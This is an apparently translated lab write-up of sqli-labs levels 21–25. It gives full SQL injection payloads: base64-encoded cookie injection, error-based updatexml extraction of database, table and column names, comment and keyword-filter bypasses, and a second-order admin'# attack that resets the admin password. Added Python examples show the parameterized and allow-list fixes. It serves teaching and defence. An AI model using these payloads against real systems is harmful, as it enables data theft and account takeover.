SQL lab 21~25 summary (subsequent continuous update) (including secondary injection explanation)
2022-07-07 12:24:00 【hcjtn】
Level 21
Entering admin appears to make no difference at first.
Capture the request for level 21:
The cookie has changed: instead of the plain admin of the previous level it is a string of seemingly random characters.
This is because admin has been base64-encoded, and the server decodes it with:
$cookee = base64_decode($cookee);
Decoding it once gives admin.
The rest is the same as level 20; the payload only has to be base64-encoded first.
Take: admin 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- q
Turn into :YWRtaW4gJ2FuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpLDEpIC0tIHEKCg==
Result: the -- q comment is easy to get wrong when encoding, so instead of commenting out the rest of the statement we close it with: and '1'='1
Analysing the source code:
$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1"
After injecting the payload the statement becomes:
$sql="SELECT * FROM users WHERE username=('admin 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1') LIMIT 0,1"
Note how the trailing single quote that originally closed '$cookee' now pairs with the quote in and '1'='1', so the quoting stays balanced and the updatexml() call executes.
Therefore:
Query the database name: admin 'and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1
Query the table name: admin 'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) and '1'='1
Query the column name: admin 'and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1) and '1'='1
Query the data: admin 'and updatexml(1,concat(0x7e,(select id from emails limit 0,1) , 0x7e),1) and '1'='1
Level 22
Looking at the source code:
$cookee1 = '"'. $cookee. '"';
echo "<br></font>";
$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";
The username is wrapped in double quotes (" ").
Everything else is the same as level 21:
Query the database name: admin "and updatexml(1,concat(0x7e,(select database()),0x7e),1) and "1"="1
Query the table name: admin "and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) and "1"="1
Query the column name: admin "and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1) and "1"="1
Query the data: admin "and updatexml(1,concat(0x7e,(select id from emails limit 0,1) , 0x7e),1) and "1"="1
Level 23
This level again takes the parameter via GET, which is familiar by now.
Enter ?id=1' and 1=2 -- q
Result:
The q is not being treated as commented out, so the comment is not taking effect here.
Looking at the source code we find:
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
preg_replace() is a regular-expression replacement function. It can also run a callback, and with the /e modifier it used to evaluate the replacement, which is how some template engines were built (it is still just string replacement). In this source code any # or -- in $id is replaced with an empty string, so the comment marker is stripped.
And because the error branch prints mysql_error():
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
So error-based injection works, e.g.:
?id=1'and updatexml(1,concat(0x7e,(select database()),0x7e),1)or '1'='1
Level 24
This level calls for second-order injection.
Second-order injection: malicious data constructed by the attacker is first stored in the database; when that data is later read back and placed into an SQL statement, the injection takes place.
It has two main steps:
Inserting the malicious data:
- When the data is first written to the database only special characters are escaped, so the original data is stored as-is, although it carries a malicious payload.
Using the malicious data:
- Once the data is in the database, developers treat it as trusted. The next time it is needed it is read straight out of the database and used in a query without further checking or processing, which causes the second-order SQL injection.
In level 24 we register an account with the username admin'# and then log in with it.
First look at the source code:
<html>
<head>
</head>
<body bgcolor="#000000">
<?PHP
session_start();
if (!isset($_COOKIE["Auth"]))
{
if (!isset($_SESSION["username"]))
{
header('Location: index.php');
}
header('Location: index.php');
}
?>
<div align="right">
<a style="font-size:.8em;color:#FFFF00" href='index.php'><img src="../images/Home.png" height='45'; width='45'></br>HOME</a>
</div>
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
if (isset($_POST['submit']))
{
# Validating the user input........
$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);
if($pass==$re_pass)
{
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
$row = mysql_affected_rows();
echo '<font size="3" color="#FFFF00">';
echo '<center>';
if($row==1)
{
echo "Password successfully updated";
}
else
{
header('Location: failed.php');
//echo 'You tried to be smart, Try harder!!!! :( ';
}
}
else
{
echo '<font size="5" color="#FFFF00"><center>';
echo "Make sure New Password and Retype Password fields have same value";
header('refresh:2, url=index.php');
}
}
?>
<?php
if(isset($_POST['submit1']))
{
session_destroy();
setcookie('Auth', 1 , time()-3600);
header ('Location: index.php');
}
?>
</center>
</body>
</html>
$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);
if($pass==$re_pass)
{
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
Here there is a function we have not seen before:
mysql_real_escape_string
mysql_real_escape_string() escapes the special characters in a string before it is used in an SQL statement.
The following characters are affected:
- \x00
- \n
- \r
- \
- '
- "
- \x1a
On success the function returns the escaped string; on failure it returns false.
Tip: this function is meant to defend against database attacks (SQL injection).
In the source code above, username is the only value that does not pass through this function, so username is the only field that can be used for SQL injection.
Substitute admin'# for $username:
$sql = "UPDATE users SET PASSWORD='$pass' where username='admin'#' and password='$curr_pass' ";
The ' in admin'# closes the username='admin' string and the # comments out everything after it.
So if we log in as admin'# and change the password (with $pass==$re_pass), the statement actually executed is:
$sql = "UPDATE users SET PASSWORD='$pass' where username='admin'#' and password='$curr_pass' ";
which changes admin's password.
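To make the two steps of second-order injection concrete, here is an added example (not the lab's code) that reproduces the level 24 pattern in Python against an in-memory SQLite database. SQLite stands in for MySQL, so its -- comment marker plays the role that # plays in the admin'# payload; the account names and passwords are constructed sample data. The vulnerable function mirrors the lab's UPDATE (passwords escaped, session username concatenated raw); the safe function shows the fix, which is to bind every value as a parameter, including data read back from the database.

```python
import sqlite3

# Added example, not the lab's code. SQLite replaces MySQL here, so "--" is
# used where the lab payload uses "#". All usernames/passwords are constructed.


def escape(value: str) -> str:
    """Stand-in for mysql_real_escape_string(): SQLite escapes a quote by doubling it."""
    return value.replace("'", "''")


def setup() -> sqlite3.Connection:
    """Create a users table and register two accounts the way a registration page would."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Step 1 of second-order injection: the registration INSERT itself is safe
    # (parameterized), so the quote in the attacker's username is stored verbatim.
    for user, pw in [("admin", "admin-secret"), ("admin'--", "attacker-pw")]:
        conn.execute("INSERT INTO users VALUES (?, ?)", (user, pw))
    conn.commit()
    return conn


def change_password_vulnerable(conn, session_username, current_password, new_password):
    """Mirror of the lab's UPDATE: passwords are escaped, but the username read back
    from the session is trusted and concatenated unescaped (step 2 of the injection)."""
    sql = "UPDATE users SET password='%s' WHERE username='%s' AND password='%s'" % (
        escape(new_password), session_username, escape(current_password))
    cur = conn.execute(sql)
    conn.commit()
    return sql, cur.rowcount


def change_password_safe(conn, session_username, current_password, new_password):
    """The fix: every value, including data read back from the database, is bound as a parameter."""
    cur = conn.execute(
        "UPDATE users SET password=? WHERE username=? AND password=?",
        (new_password, session_username, current_password))
    conn.commit()
    return cur.rowcount


def password_of(conn, username):
    row = conn.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()
    return row[0] if row else None


def demo_vulnerable():
    """Stored username admin'-- with a wrong current password: returns (sql, rows, admin pw, attacker pw)."""
    conn = setup()
    sql, rows = change_password_vulnerable(conn, "admin'--", "wrong-current", "owned")
    return sql, rows, password_of(conn, "admin"), password_of(conn, "admin'--")


def demo_safe():
    """Same request through the parameterized version: returns (rows, admin pw)."""
    conn = setup()
    rows = change_password_safe(conn, "admin'--", "wrong-current", "owned")
    return rows, password_of(conn, "admin")


if __name__ == "__main__":
    sql, rows, admin_pw, attacker_pw = demo_vulnerable()
    print(sql)                 # ... WHERE username='admin'--' AND password=... : the check is commented out
    print(rows, admin_pw)      # 1 owned   (admin's row was changed, attacker's own row untouched)
    print(demo_safe())         # (0, 'admin-secret')
```

The rowcount is the detail worth checking in a code review: the vulnerable version reports one affected row even though the caller never supplied admin's current password, because the WHERE clause was cut off at the comment marker.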
Level 25
Looking at the source code we find:
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive)
return $id;
}
If and or or appear in the input, preg_replace replaces them with an empty string.
In /or/i, the i means case-insensitive, so both and and AND are replaced, and likewise or.
So we use MySQL's symbolic logical operators instead (&& for and, || for or):
?id=1' && 1=1 -- q
Note: in a URL, & separates parameters,
so && must be URL-encoded (%26%26).
In the URL bar enter: ?id=1' %26%26 1=2-- q
Continuing with the source code:
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
So union queries cannot be used, but error-based injection works.
But when we then enter ?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) -- q
we find
in the error message:
information has become infmation: the or was removed by the function.
So write information as infoorrmation; after the function's replacement it becomes information again,
and error-based injection can proceed.
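The level 23 comment stripping and the level 25 keyword stripping fail for the same reason: a single-pass string replacement is not input validation. The added example below (my code, not the lab's) ports both filters to Python so their behaviour on sample inputs can be checked, and puts an allow-list check beside them, which is the control that would actually have closed the hole for a numeric id (together with a parameterized query). The sample inputs are constructed.

```python
import re

# Added example, not the lab's code. Ports the two PHP filters shown above and
# contrasts them with an allow-list check. Sample inputs are constructed.


def strip_comments(value: str) -> str:
    """Level 23: preg_replace('/#/', '') followed by preg_replace('/--/', ''), one pass each."""
    value = re.sub(r"#", "", value)
    value = re.sub(r"--", "", value)
    return value


def blacklist(value: str) -> str:
    """Level 25 blacklist(): remove 'or' then 'and', case-insensitively, one pass each."""
    value = re.sub(r"or", "", value, flags=re.IGNORECASE)
    value = re.sub(r"and", "", value, flags=re.IGNORECASE)
    return value


def validate_id(value: str):
    """Allow-list alternative: the id must be a plain unsigned integer; anything else is rejected (None)."""
    return int(value) if re.fullmatch(r"\d+", value) else None


def filter_report(value: str) -> dict:
    """Run one candidate id through both filters and the allow-list so the three can be compared."""
    return {
        "after_comment_strip": strip_comments(value),
        "after_blacklist": blacklist(value),
        "allowed": validate_id(value),
    }


if __name__ == "__main__":
    for sample in ["1", "1' and 1=2 -- q", "information", "infoorrmation", "1' && 1=1"]:
        print(repr(sample), filter_report(sample))
```

Two things the report makes visible: the blacklist damages legitimate text as well ("information" loses its "or"), and neither filter changes the verdict of the allow-list, which rejects everything that is not a bare integer regardless of how it is spelled.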